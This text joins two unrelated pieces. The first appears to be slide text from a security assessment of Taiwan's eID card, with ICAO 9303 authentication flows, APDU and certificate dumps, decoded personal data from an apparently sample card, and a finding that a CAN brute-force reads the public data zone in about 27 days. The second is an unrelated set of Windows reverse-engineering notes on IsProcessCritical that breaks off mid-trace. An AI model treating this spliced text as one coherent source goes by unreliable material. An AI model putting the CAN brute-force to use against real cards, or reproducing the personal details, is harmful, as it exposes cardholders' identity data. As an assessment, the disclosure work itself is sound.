Identifier ‘02’)
EF.SOD
(Short File
Identifier ‘1D’)
EF.DG16
(Short File
Identifier ‘10’)
……
Data Group | EF Name | Short EF Identifier | EF Identifier | Tag
Common | EF.COM | 1E | 01 1E | 60
DG1 | EF.DG1 | 01 | 01 01 | 61
DG2 | EF.DG2 | 02 | 01 02 | 75
DG3 | EF.DG3 | 03 | 01 03 | 63
DG4 | EF.DG4 | 04 | 01 04 | 76
DG5 | EF.DG5 | 05 | 01 05 | 65
DG6 | EF.DG6 | 06 | 01 06 | 66
DG7 | EF.DG7 | 07 | 01 07 | 67
DG8 | EF.DG8 | 08 | 01 08 | 68
DG9 | EF.DG9 | 09 | 01 09 | 69
DG10 | EF.DG10 | 0A | 01 0A | 6A
DG11 | EF.DG11 | 0B | 01 0B | 6B
DG12 | EF.DG12 | 0C | 01 0C | 6C
DG13 | EF.DG13 | 0D | 01 0D | 6D
DG14 | EF.DG14 | 0E | 01 0E | 6E
DG15 | EF.DG15 | 0F | 01 0F | 6F
DG16 | EF.DG16 | 10 | 01 10 | 70
Document Security Object | EF.SOD | 1D | 01 1D | 77
Common | EF.CARDACCESS | 1C | 01 1C | -
Common | EF.ATR/INFO | 01 | 2F 01 | -
Common | EF.CardSecurity | 1D | 01 1D | -
Reading EF.CardAccess
• [30 0d [06 08 04 00 7f 00 07 02 02 02] [02 01 02]]
• [30 0f [06 0a 04 00 7f 00 07 02 02 03 02 02] [02 01 02]]
• [30 12 [06 0a 04 00 7f 00 07 02 02 04 02 04] [02 01 02]
[02 01 12]]
• [30 17 [06 06 67 81 08 01 01 05] [02 01 01] [06 0a 04 00
7f 00 07 01 01 04 01 03]]
• [30 19 [06 09 04 00 7f 00 07 02 02 03 02] [30 0c [06 07 04
00 7f 00 07 01 02] [02 01 12]]
• 90 00
Type | Tag encoding
Boolean | 0x01
Integer | 0x02
Bitstring | 0x03
Octetstring | 0x04
Null | 0x05
Object identifier | 0x06
Sequence | 0x30
Sequence of | 0x30
Set | 0x31
Set of | 0x31
UTCTime | 0x17
id-PACE-ECDH-GM-AES-CBC-CMAC-256
v2
p521
id-TA
v2
id-CA-ECDH-AES-CBC-CMAC-128
Active Authentication protocol
id-CA-ECDH
bsiEcKeyType
ecdsa-plain-SHA256
OID Repository
27
28
Learning from JMRTD
從 JMRTD 中學習
30
Authentication Process
鑑別程序
31
Read EF.CardAccess (Required)
讀取 EF.CardAccess (必要)
Read EF.DIR (Optional)
讀取 EF.DIR (非必要)
Authenticate with PACE
使用 PACE 進行鑑別
Authenticate with BAC
使用 BAC 進行鑑別
Starting 1 January 2018, eMRTD chips implementing PACE only
2018/1/1 後的 eMRTD 晶片只實作 PACE
32
Process of BAC
IFD
IC
1. Get Challenge
2. RND.IC
RND.IFD and K.IFD
S = RND.IFD || RND.IC || K.IFD
EIFD = E(KEnc, S)
MIFD = MAC(KMAC, EIFD)
3. External Authenticate
K.IC
R = RND.IC || RND.IFD || K.IC
EIC = E(KEnc, R).
MIC = MAC(KMAC, EIC).
EIC || MIC.
KSEnc and KSMAC
KS.SEED = K.IFD XOR K.IC
EIFD || MIFD
EIC || MIC
4. Communicate with Session Key
The biggest issue of BAC is probably its use of 3DES?
Process of PACE GM

(IFD and IC; PACEInfo has already been obtained from EF.CardAccess)
1. The IFD sets the PACE parameters (MSE:Set AT).
2. The IC generates a nonce; the IFD retrieves it in encrypted form.
3. Both sides generate temporary key pairs for mapping and exchange the public keys.
4. Using the nonce, both sides derive the mapped domain parameters, generate key pairs for key agreement, and exchange those public keys.
5. Both sides compute the agreed keys and the authentication tokens, and exchange the tokens.
Password encoding:
• MRZ: SHA-1(Document Number || Date of Birth || Date of Expiry)
• CAN: the ISO 8859-1 encoded string
K_π = KDF_π(f(π), 3)
z = E(K_π, RND.IC)
IC
IPS
z
RND.IC = D (K∏, z)
D = Map(DIC, RND.IC, ….)
D = Map(DIC, RND.IC, ….)
Choose (SKDH,IPS, PKDH,IPS)
Based on D
Choose (SKDH,IC, PKDH,IC)
Based on D
PKDH,IC
PKDH,IPS
K=KA(PKDH,IC, SKDH,IPS)
K=KA(SKDH,IC, PKDH,IPS)
Generate KSEnc, KSMAC
Generate KSEnc, KSMAC
TIC = MAC(KSMAC, PKDH,IPS)
[AIC = E(KSENC, CAIC)]
TIPS = MAC(KSMAC, PKDH,IC)
TIC [,AIC]
TIPS
[PKDH,IC ?= KA(CAIC, PKIC, D)]
36
DG11
• 6B70[5F040BE69FB3F0A98D9CF0A795A6][5F0500][5F060B[4C49552C44554F2D54554F]][5F070
A53323330383932373338][5F08083139363731313231][5F090130][5F0A09415430303030303035]
[5F0B083230333031303135][5F0C083230323031303135][5F0D103130303039303139353231303
0323339]000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000009000
LIU,DUO-TUO
S230892738
19671121
AT0000005
20301015
20201015
1000901952100239
DG12
• 6C3D[5F0E0120][5F0F36E696B0E58C97E5B882E7919EE88AB3E58D80E9BE8DE5B1B1E9878C
303130E984B0E980A2E794B2E8B7AFEFBC92EFBC98EFBC90E8999F]00000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000009000
新北市瑞芳區龍山里010鄰逢甲路280號
From Accessing the Public Data Zone to the Encrypted Data Zone

Public Data Zone flow: Select card application → Set parameters → PACE → Active Authentication → Data access
Encrypted Data Zone flow: Select card application → Set parameters → PACE → Chip Authentication → Terminal Authentication → Data access
Chip Authentication Process

The IC holds (D.IC, SK.IC, PK.IC); the IPS generates an ephemeral key pair (~SK.IPS.CA, ~PK.IPS.CA).
IPS → IC: ~PK.IPS.CA
IPS: K = KA(~SK.IPS.CA, PK.IC, D.IC)
IC: K = KA(SK.IC, ~PK.IPS.CA, D.IC)
IC → IPS: r.IC, T.IC = MAC(KMAC, ~PK.IPS.CA)
Terminal Authentication Process

The IC chooses r.IC randomly and sends it to the IPS.
The IPS computes s.IPS = Sign(SK.IPS, ID.IC || r.IC || Comp(PK.IPS)) and sends s.IPS.
The IC verifies the signature.
MSE AT: Set Parameter
(MANAGE SECURITY ENVIRONMENT command with Set
Authentication Template function)
00 22 c1 a4 27
80 0a 04 00 7f 00 07 02 02 04 02 04
83 01 03
7f 4c 12 06 09 04 00 7f 00 07 03 01 02
02 53 05 00 00 00 60 00
84 01 12
PACE
Read Certificate from EF.CardSecurity
Send DV and AT Cert to Card
Set MSE:SET AT External Authentication
OID || Holder for AT ||
Temporary Public Key
Get Challenge
External Authentication
Sign(Temporary IC Public Key from the PACE process || challenge || Temporary Public Key)
43
Certified Host
EID Center
DV certificate and AT certificate
[0] Version: 3
SerialNumber: 28156782072750167572079822468317946189
IssuerDN: C=TW,O=行政院,OU=內政部,OU=戶政司,CN=CSCA
Start Date: Fri Sep 25 11:37:12 CST 2020
Final Date: Tue Mar 25 23:59:59 CST 2031
SubjectDN: C=TW,O=行政院,OU=內政部,OU=戶政司,CN=DS202009250001
Public Key: EC Public Key [c6:7c:fb:e1:c8:4f:e3:4a:4d:23:2a:ab:2e:06:57:77:5e:27:d6:b4]
X: 7db0dd8864840f9856c957715162c28c346c936cc92fdff9c1ffb110c09dac3e7ae067ba4a0b8e93bd86451b860377b85d67da133ee5d10bafaa7068dc88c76056
Y: 96139cc7cfe114c851e96b0d03b851fd16d19b5d61e3cbccf7a135f69e047f7765771600bc6afc633bb17aa8953a7a4ea8cfe22a3b179b8b1b66f8b1340b7d97dd
Signature Algorithm: SHA256withECDSA
Signature: 308188024201cce9925eccee1a00ba46625a6c13c0a70c3dc9bb368253c6917c3f399bc4c20087e0f3f1595ae193ee474cafebc386f8a40aa5040103
2060314d2b400ed66b20ad0242008800e154df65aeb9bae33d7bb45f1fd6800a8e335c2a21eba5ae033c56f06e29384ac5308654ca0fbd98b19e5e29
cdace675d157c66e09a49fa69b5be91d2b3f25
Extensions:
critical(false) 2.5.29.16 value = Sequence
Tagged [0] IMPLICIT
DER Octet String[15]
Tagged [1] IMPLICIT
DER Octet String[15]
critical(false) 2.5.29.35 value = Sequence
Tagged [0] IMPLICIT
DER Octet String[20]
critical(false) 2.5.29.14 value = DER Octet String[20]
critical(true) KeyUsage: 0x80
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOICVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
040048B5D4E6C2B2E91B3D3DCF5C91E4A0C45BFE98086EBEF6440FFB20326BD5BC978CAACE4BCDA82731DDAE3EF880
BFB4F7A6A5BE30798CF36A2833D9B186A4F916E10022B0E68FEB6CD42FD2ADB52FC30E181BD8A73432E1BB3F7928653B
D4CF3D7727904C36C3B2890527472BCF476323D89192AE82973B0081D7B02C939950C08CF37C
5f20 HOLDER_REFERENCE TW/MOIDVCAG1/00001
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS BFFFFFFFFF: DV-domestic/Age Verification, Community ID Verification, Restricted
Identification, Privileged Terminal, CAN Allowed, PIN Management, Install Certificate, Install Qualified Certificate, R-DG1, R-DG2,
R-DG3, R-DG4, R-DG5, R-DG6, R-DG7, R-DG8, R-DG9, R-DG10, R-DG11, R-DG12, R-DG13, R-DG14, R-DG15, R-DG16, R-
DG17, R-DG18, R-DG19, R-DG20, R-DG21, RFU-29, RFU-30, RFU-31, RFU-32, W-DG21, W-DG20, W-DG19, W-DG18, W-DG17
5f25 EFFECTIVE_DATE 2020-09-17
5f24 EXPIRATION_DATE 2026-03-17
5f37 SIGNATURE
A2AD152186C5E700DA2CCAB883B85CAF2AC2892643011452D421E8CE45C311D96A1DA3BFB1992054751B2FDE7AC9DE6F
869400740920519D676C37DF8028A520DBBE96602C317AD338439DBDCBC122338D4990BA6EE30B07E40BDC0F3E2D3F31F
E8D8DAA9C8BF7AC6BA8241F24C4ED94FB2D332016A54FF35F02623AC857C77DAFF6
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOIDVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
0401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA67700004D41A089
02C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578BFE80451DA6F13B9C2D2
92B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03A9E6B633997C8A2EE3EB
5f20 HOLDER_REFERENCE TW/MOICA0085/00000
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS 0000006000: Authentication-Terminal/R-DG6, R-DG7
5f25 EFFECTIVE_DATE 2020-11-20
5f24 EXPIRATION_DATE 2020-11-26
5f37 SIGNATURE
0151F4D4706828898DC1EA8AE4D9292105D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E
4BF4E719097CCD48057F4EB79C22F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269
A6D759F65C2E27EAFF1429C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
46
ECC Output …
• 0300A55A05060014A092B6642E095A78929DA3116678EFCB10533BA8A21B7D008A09E287E00B98924BDD55E55C2BF1A50BE5849706A85E27EDB61B857AA65ED3A4A4D0
• 00A55A05060014A092B6642E095A78929DA3116678EFCB10533BA8A21B7D008A09E287E00B98924BDD55E55C2BF1A50BE5849706A85E27EDB61B857AA65ED3A4A4D0
MSE set AT Ext Auth: 9000
Get Challenge: 386496050041522C9000
386496050041522C
select file DG6: 990290008E08C006DC1E2DB1D3BD9000
decrypted verified:9000
readbinary:878201A101FBE49AE2CA4342F6B0397AE2AAAE9854BF0687740B6D79C12480E2B0DAEA0D051E5733E7EAA544
6EDBD8287EA19D962622E426C12C4DC427BAC21B71DAD16D29ECDD984BF460E6779DB5C29B495C481D036BF6C2CED8
F1B9B25165F04C0DB72F4569D11E757A845D42E5DA88D34BC70F0930696AC657496D88D43261A4C7C502B37B51A0808665
E9B9CB41C05BB579F44168110350A14070EF1879DCBD755678EFB2AB669910CCC1AEEB0A4B0C873B49565CC3762C07D5
7D2CA9289C1F4D8E53206A9899AD5C8BB624FFDAA6B08371606E88CDE55DDFA3293FC3AD2036D56D85105379D288CD78
D7D31C4AA206F2F344A62E9539E2BEFF8B6F3A86FFD3EC86D5281F1DA3D1F4BFA3C3E4C429D762635CB8041840FEFFDE
A3C65AC34C7A209D81A5EFD8C97CC89D9E848593FCB1306D14532F3B41E2141292B00D3535DAF08FF8FE588BC29E2C22
6B1981AB53AA297D7D3F2F09B2A3B8D9C803C4F7F353E89E31F3C10482AB6A661F3680C14C01DF97B58EF9BC275D8DFB
708C518EDF2C8620710ABDE7A1A6A69A33F28EEB71EC533ECD7F52EC7FE8FEABA1261407AB2839D1BD990290008E080A
B6AC20C88203199000
decrypted
DG6:66205F1301315F140BE69FB3F0A28A96F0AAA9A85F15005F16083035303339323930000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009000
柳𢊖𪩨
1
05039290 (Random Value)
DG7:67205F1701315F180BE5A79CF0AFA58EF3BCBB945F19005F1A08393033393030363800000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000009000
49
姜
Identifying Potential Vulnerabilities
Security Mechanisms for eMRTD in ICAO 9303-11
• Passive Authentication
• Active Authentication
• BAC (Basic Access Control)
• PACE (Password Authenticated Connection Establishment)
• Chip Authentication
• Terminal Authentication
• Data Encryption
EID / Terminal / EID Center (scope)

We do not address chip security here, nor the security of the backend system.

Risk Scenario 1: data can be accessed without authentication and permission.
Risk Scenario 2: TA cannot be used to forbid an unauthorized terminal.
https://ninjalab.io/a-side-journey-to-titan/
Key Findings
Access without TA (only PACE with CAN)

Zone | Accessible        Zone | Accessible
DG1  | △ (via DG13)      DG9  | X (6982)
DG2  | ○                 DG10 | △ (via DG13)
DG3  | X (6982)          DG11 | ○
DG4  | X (6982)          DG12 | ○
DG5  | X (6982)          DG13 | ○
DG6  | X (6982)          DG14 | △ (via DG13)
DG7  | X (6982)          DG15 | ○
DG8  | X (6982)          DG16 | △ (via DG13)
Access Encrypted Data Zone with Contact and Contactless Interface

Contact interface / Contactless interface:
7F218201747F4E81E85F290100421054574D4F4944564341473130303030317F498194060A04007F0007020202
02038681850401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA
67700004D41A08902C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578B
FE80451DA6F13B9C2D292B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03
A9E6B633997C8A2EE3EB5F201054574D4F4943413030383530303030307F4C12060904007F00070301020253
0500000060005F25060200010102005F24060200010102065F3781840151F4D4706828898DC1EA8AE4D929210
5D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E4BF4E719097CCD48057F4EB79C2
2F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269A6D759F65C2E27EAFF1429
C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
7F218201747F4E81E85F290100421054574D4F4944564341473130303030317F498194060A04007F0007020202
02038681850401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA
67700004D41A08902C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578B
FE80451DA6F13B9C2D292B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03
A9E6B633997C8A2EE3EB5F201054574D4F4943413030383530303030307F4C12060904007F00070301020253
0500000060005F25060200010102005F24060200010102075F3781840151F4D4706828898DC1EA8AE4D929210
5D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E4BF4E719097CCD48057F4EB79C2
2F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269A6D759F65C2E27EAFF1429
C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
7f21 CV_CERTIFICATE
7f4e CERTIFICATE_BODY
5f29 PROFILE_IDENTIFIER 0
42 CA_REFERENCE TW/MOIDVCAG1/00001
7f49 PUBLIC_KEY
6 OID 0.4.0.127.0.7.2.2.2.2.3
86 PUBLIC_POINT_Y
0401CF9D14C148602C9A391541614EF330C47C6402E51A41A4A71403434F68F0DFE7D8FF0CEA67700004D41A089
02C8F8D46D583355607FFB673403B44174BCA7BF13B00689BA97774145503F7B1532578BFE80451DA6F13B9C2D2
92B42A0D145559CED9A5DBA7CA01FAAB9EF9F6D634CBD44B3F540E669E0CAC03A9E6B633997C8A2EE3EB
5f20 HOLDER_REFERENCE TW/MOICA0085/00000
7f4c HOLDER_AUTH_TEMPLATE
6 OID 0.4.0.127.0.7.3.1.2.2
53 ROLE_AND_ACCESS_RIGHTS 0000006000: Authentication-Terminal/R-DG6, R-DG7
5f25 EFFECTIVE_DATE 2020-11-20
5f24 EXPIRATION_DATE 2020-11-27
5f37 SIGNATURE
0151F4D4706828898DC1EA8AE4D9292105D5D7F209FF1DECE8BD5D9645B2049FCC9EF2A5D5F2E5D941CEE8C2E
4BF4E719097CCD48057F4EB79C22F22473C293EC33A0177C1EFE4C1949EDE45DFCCF1E72B4B42F1F1912489269
A6D759F65C2E27EAFF1429C39A76EA7F73DA6739097425C59E742F2893998242300C45435BC276AD8016B
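The TLV dump above can be reproduced mechanically. Below is a minimal BER-TLV header reader — an illustrative sketch, not the tool that produced the dump — applied to the first bytes of the certificate to recover the outer CV_CERTIFICATE and CERTIFICATE_BODY tags and lengths:

```python
# Minimal BER-TLV header reader (ISO 7816-4 rules): a tag is multi-byte when
# the low 5 bits of its first byte are all set; a length is long-form when
# bit 8 of the first length byte is set.

def read_tlv_header(data: bytes, off: int = 0):
    """Return (tag, length, value_offset) for the TLV starting at `off`."""
    tag = data[off]
    off += 1
    if tag & 0x1F == 0x1F:            # multi-byte tag (e.g. 0x7F21)
        tag = (tag << 8) | data[off]  # tags >2 bytes not needed here
        off += 1
    length = data[off]
    off += 1
    if length & 0x80:                 # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(data[off:off + n], "big")
        off += n
    return tag, length, off

# First bytes of the CV certificate shown above
cert = bytes.fromhex("7F218201747F4E81E85F290100")
tag, length, off = read_tlv_header(cert)              # outer CV_CERTIFICATE
inner_tag, inner_len, _ = read_tlv_header(cert, off)  # CERTIFICATE_BODY
print(hex(tag), hex(length), hex(inner_tag), hex(inner_len))
```

This matches the parse tree above: tag 7f21 with length 0x174, containing tag 7f4e with length 0xe8.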
The performance of contactless card reading depends on the position of the card; read speed is tied to reading stability
64
The performance via the contact interface is better than via the contactless interface
63CX: Verify fail, X tries left
Ex. 63C3: Verify fail, 3 tries left.
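The retry counter lives in the low nibble of SW2 when SW1/SW2 is 63 CX. A tiny decoder sketch:

```python
# 63 CX status word: SW1 = 0x63, SW2 = 0xC0 | n, where the low nibble n is
# the number of verification tries left.
def verify_tries_left(sw1: int, sw2: int):
    """Return remaining verification tries if the status word is 63 CX, else None."""
    if sw1 == 0x63 and (sw2 & 0xF0) == 0xC0:
        return sw2 & 0x0F
    return None

print(verify_tries_left(0x63, 0xC3))  # 63C3 -> 3 tries left
```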
65
Summary of Findings
• The data in the Public Data Zone can be accessed via a brute-force attack against the CAN. A malicious party can therefore read a card's data without ever touching the card in at most about 27 days (at roughly 2.4 s per contactless read: 2,400,000 s total; 2,400,000/86,400 ≈ 27 days)
• MRZ could be better than CAN: requiring the MRZ for contactless access would lengthen the brute-force time
• A terminal cannot be actively deactivated: under the current TA design the card has no way to fetch a CRL or call OCSP
• If terminal binding is really required, a SAM could be used to protect the terminal private key, together with shortening the validity period of the AT certificate
• The AA mechanism could be misused
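The 27-day figure in the first bullet follows from a simple calculation. One assumption is labeled here: the slide states ~2.4 s per read and a 2,400,000-second total, which implies a 10^6-candidate keyspace (i.e., a 6-digit CAN) — the keyspace size is inferred, not stated on the slide:

```python
# Worst-case exhaustive CAN search time, using the slide's numbers.
CANDIDATES = 10 ** 6          # assumed: 6-digit CAN -> 1,000,000 candidates
SECONDS_PER_TRY = 2.4         # one contactless read attempt (from the slide)
days = CANDIDATES * SECONDS_PER_TRY / 86_400
print(f"{days:.1f} days")     # ~27.8 days worst case
```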
66
67
EID
Terminal
EID Center
68
Obtain AA Certificate (DG15)
00 88 00 00 RND.IFD (INTERNAL AUTHENTICATE)
Signature generated by the IC
Recommendation
69
Information Collection
Learning How it Works?
Identifying Potential Vulnerabilities
Key Findings
Recommendation
Conclusion and Recommendation
• An integrated-circuit identification card can improve the security and convenience of using online services. As national online services may all come to rely on the card, its security and privacy issues must be considered carefully.
• The suspended EID card adopts the ICAO 9303 specification. We did not find critical security issues in the implementation.
• The data in the Public Data Zone can be read via a brute-force attack against the CAN over the contactless interface.
• The contactless interface is very important for smart-phone applications. We suggest keeping the interface, making good use of it, and adjusting which data it can access.
• Supporting FIDO CTAP2 could be considered.
• As the data currently stored in the Encrypted Data Zone is not very sensitive, the present software-certificate-based terminal-authentication scheme poses no significant risk. If anything, requiring terminal binding to read the Encrypted Data Zone may be inconvenient for some applications.
70
Thank You
71
kernel32 export redirection
For now we set aside the details of the user-to-kernel mode transition.
kernel32!IsProcessCritical
→ api-ms-win-core-processthreads-l1-1-2.IsProcessCritical
→ kernelbase!IsProcessCritical
→ NtQueryInformationProcess, information class 0x1d (29)
→ ntoskrnl: the real implementation of NtQueryInformationProcess
For background on critical processes, see MSDN:
https://devblogs.microsoft.com/oldnewthing/20180216-00/?p=98035
Here we just record the process of reversing this API.
Tracing from kernel32 into api-ms-win-core-processthreads-l1-1-2.dll, that DLL only carries the string in its .rdata section and points straight back to kernel32.
Reference: https://twitter.com/MiasmRe/status/1270277962873610243
We find that api-ms-win-core-processthreads-l1-1-2.dll holds no detailed ApiSet description of this API; it supplies only the name, which is then resolved by apisetschema.dll (that module itself exports only anSi).
https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html
ApiSet mechanism
Such a DLL exists purely as a compatibility shim — a temporary relay. It is a wrapper with no real code and an empty import table; each Windows version adds or removes APIs by filtering here, finally forwarding to the function that will actually be called.
We know that many APIs in kernel32 go through kernelbase.dll — CreateFile's stub, for example. As versions advance, without any countermeasure kernelbase.dll would inevitably grow ever more bloated.
The problem is that, with this re-factoring, a single DLL might contain multiple logical sets of
APIs
Microsoft therefore redesigned the DLL architecture. In this design, a Virtual DLL is what we normally touch directly — kernel32, user32, and so on. ApiSetSchema is the resolution mechanism, relying on apisetschema.dll plus the api-set compatibility DLLs. A Logical DLL is the dynamic-link library that truly implements the function's code.
So what we need to analyze is kernelbase.dll!IsProcessCritical.
apisetschema
The apisetschema mechanism is activated in the early boot phase; Winload.exe loads it during boot:
Winload!OslpLoadAllModules
Winload!OsLoadImage
nt!MiInitializeApiSets
Part two, which describes the structure of ApiSetSchema:
https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-ii.html
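The contract names themselves encode a versioned namespace. As an illustrative sketch — this shows only the naming convention, not the loader's actual schema lookup, and the regex is our own — the name seen earlier splits like so:

```python
import re

# API set contract names follow <api|ext>-<namespace>-l<M>-<m>-<p>; the loader
# uses the name (minus its version suffix) as the key into the apisetschema
# map to find the host DLL (here, kernelbase.dll).
NAME = "api-ms-win-core-processthreads-l1-1-2"

m = re.fullmatch(r"(api|ext)-(.+)-l(\d+)-(\d+)-(\d+)", NAME)
kind, namespace, major, minor, patch = m.groups()
print(kind, namespace, (int(major), int(minor), int(patch)))
```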
kernelbase
Now we finally get to the main topic. `uf` the function:
(Aside — the Quarkslab part-ii article ships these scripts:
ApiSetMapLoad.py: extracts the content of the .apisetmap section (from apisetschema.dll) to a file.
ApiSetMapParse.py: parses the content of the .apisetmap section.
SearchFiles.py: searches for all Virtual DLL files on a system.
out_parsingapiset.txt: example output of ApiSetMapParse.py on Windows 8 Consumer Preview 32-bit.
win7_64_names.txt: output of SearchFiles.py on Windows 7 SP1 64-bit.
win8_32_CP_names.txt: output of SearchFiles.py on Windows 8 Consumer Preview 32-bit.
The author describes the ApiSetSchema structure and provides these Python scripts; backup:
https://github.com/bopin2020/WindowsCamp/blob/main/NT%20Kernel/Misc/Dll_mechanism/apisetmap-scripts-part2.zip)
To check whether a process is critical, user mode calls through KERNELBASE!_imp_NtQueryInformationProcess:
0:004> uf 00007ffd`43c83070
KERNELBASE!IsProcessCritical:
00007ffd`43c83070 48895c2408 mov qword ptr [rsp+8],rbx
00007ffd`43c83075 57 push rdi
00007ffd`43c83076 4883ec30 sub rsp,30h
00007ffd`43c8307a 33db xor ebx,ebx
00007ffd`43c8307c 4c8d442450 lea r8,[rsp+50h]
00007ffd`43c83081 488bfa mov rdi,rdx
00007ffd`43c83084 48895c2420 mov qword ptr [rsp+20h],rbx
00007ffd`43c83089 448d4b04 lea r9d,[rbx+4]
00007ffd`43c8308d 8d531d lea edx,[rbx+1Dh]
00007ffd`43c83090 48ff15a1db0f00 call qword ptr
[KERNELBASE!_imp_NtQueryInformationProcess (00007ffd`43d80c38)]
00007ffd`43c83097 0f1f440000 nop dword ptr [rax+rax]
00007ffd`43c8309c 85c0 test eax,eax
00007ffd`43c8309e 7909 jns KERNELBASE!IsProcessCritical+0x39
(00007ffd`43c830a9) Branch
KERNELBASE!IsProcessCritical+0x30:
00007ffd`43c830a0 8bc8 mov ecx,eax
00007ffd`43c830a2 e82915efff call KERNELBASE!BaseSetLastNTError
(00007ffd`43b745d0)
00007ffd`43c830a7 eb0e jmp KERNELBASE!IsProcessCritical+0x47
(00007ffd`43c830b7) Branch
KERNELBASE!IsProcessCritical+0x39:
00007ffd`43c830a9 395c2450 cmp dword ptr [rsp+50h],ebx
00007ffd`43c830ad 0f95c3 setne bl
00007ffd`43c830b0 891f mov dword ptr [rdi],ebx
00007ffd`43c830b2 bb01000000 mov ebx,1
KERNELBASE!IsProcessCritical+0x47:
00007ffd`43c830b7 8bc3 mov eax,ebx
00007ffd`43c830b9 488b5c2440 mov rbx,qword ptr [rsp+40h]
00007ffd`43c830be 4883c430 add rsp,30h
00007ffd`43c830c2 5f pop rdi
00007ffd`43c830c3 c3 ret
The second parameter of NtQueryInformationProcess here is ProcessBreakOnTermination (0x1d). MSDN shows this information class already existed in earlier Windows versions; Windows 8.1 merely exposed IsProcessCritical as a convenience. The actual query is still performed in ring 0 by NtQueryInformationProcess. Analyzing the syscall path is not the focus of this article — it is enough to know that the arguments are copied from the user-mode stack to the kernel-mode stack, KiFastCallEntry dispatches into the kernel, and the result is returned to ntdll!NtQueryInformationProcess.
ntdll NtQueryInformationProcess
Ring 3 enters the kernel through KiFastCallEntry (call stack below). When execution returns from ring 0 — note KiSystemCallExit on the left — the third parameter of NtQueryInformationProcess already holds the query result; it has been filled in at this point. The second parameter here is 0x03; MSDN marks it as an enumeration value but does not say what 3 means.
__kernel_entry NTSTATUS NtQueryInformationProcess(
[in] HANDLE ProcessHandle,
[in] PROCESSINFOCLASS ProcessInformationClass,
[out] PVOID ProcessInformation,
[in] ULONG ProcessInformationLength,
[out, optional] PULONG ReturnLength
);
00 b13e6d48 8053e638 ffffffff 00000001 02b0fec4 nt!NtQueryInformationProcess
<Intermediate frames may have been skipped due to lack of complete unwind>
01 b13e6d48 7c92e4f4 (T) ffffffff 00000001 02b0fec4 nt!KiFastCallEntry+0xf8
<Intermediate frames may have been skipped due to lack of complete unwind>
